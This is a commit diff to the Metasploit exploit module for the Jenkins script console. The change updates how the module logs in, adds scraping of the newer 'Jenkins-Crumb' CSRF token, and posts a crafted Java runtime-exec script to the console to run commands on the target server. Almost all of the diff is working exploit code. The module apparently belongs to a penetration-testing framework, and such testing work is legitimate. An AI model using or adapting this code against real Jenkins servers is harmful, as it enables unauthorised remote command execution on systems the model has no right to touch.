Land rapid7#7511, Update jenkins_script_console to support newer versions

Author: wchen-r7

modules/exploits/multi/http/jenkins_script_console.rb

@@ -78,15 +78,15 @@ def on_new_session(client)
   def http_send_command(cmd, opts = {})
     request_parameters = {
       'method'    => 'POST',
-      'uri'       => normalize_uri(@uri.path, "script"),
+      'uri'       => normalize_uri(@uri.path, 'script'),
       'vars_post' =>
         {
           'script' => java_craft_runtime_exec(cmd),
           'Submit' => 'Run'
         }
     }
     request_parameters['cookie'] = @cookie if @cookie != nil
-    request_parameters['vars_post']['.crumb'] = @crumb if @crumb != nil
+    request_parameters['vars_post'][@crumb[:name]] = @crumb[:value] unless @crumb.nil?
     res = send_request_cgi(request_parameters)
     if not (res and res.code == 200)
       fail_with(Failure::Unknown, 'Failed to execute the command.')
@@ -159,8 +159,8 @@ def exploit
         'uri'       => normalize_uri(@uri.path, "j_acegi_security_check"),
         'vars_post' =>
           {
-            'j_username' => Rex::Text.uri_encode(datastore['USERNAME'], 'hex-normal'),
-            'j_password' => Rex::Text.uri_encode(datastore['PASSWORD'], 'hex-normal'),
+            'j_username' => datastore['USERNAME'],
+            'j_password' => datastore['PASSWORD'],
             'Submit'     => 'log in'
           }
       })
@@ -177,9 +177,12 @@ def exploit
       print_status('No authentication required, skipping login...')
     end
 
-    if (res.body =~ /"\.crumb", "([a-z0-9]*)"/)
-      print_status("Using CSRF token: '#{$1}'")
-      @crumb = $1
+    if res.body =~ /"\.crumb", "([a-z0-9]*)"/
+      print_status("Using CSRF token: '#{$1}' (.crumb style)")
+      @crumb = {:name => '.crumb', :value => $1}
+    elsif res.body =~ /crumb\.init\("Jenkins-Crumb", "([a-z0-9]*)"\)/
+      print_status("Using CSRF token: '#{$1}' (Jenkins-Crumb style)")
+      @crumb = {:name => 'Jenkins-Crumb', :value => $1}
     end
 
     case target['Platform']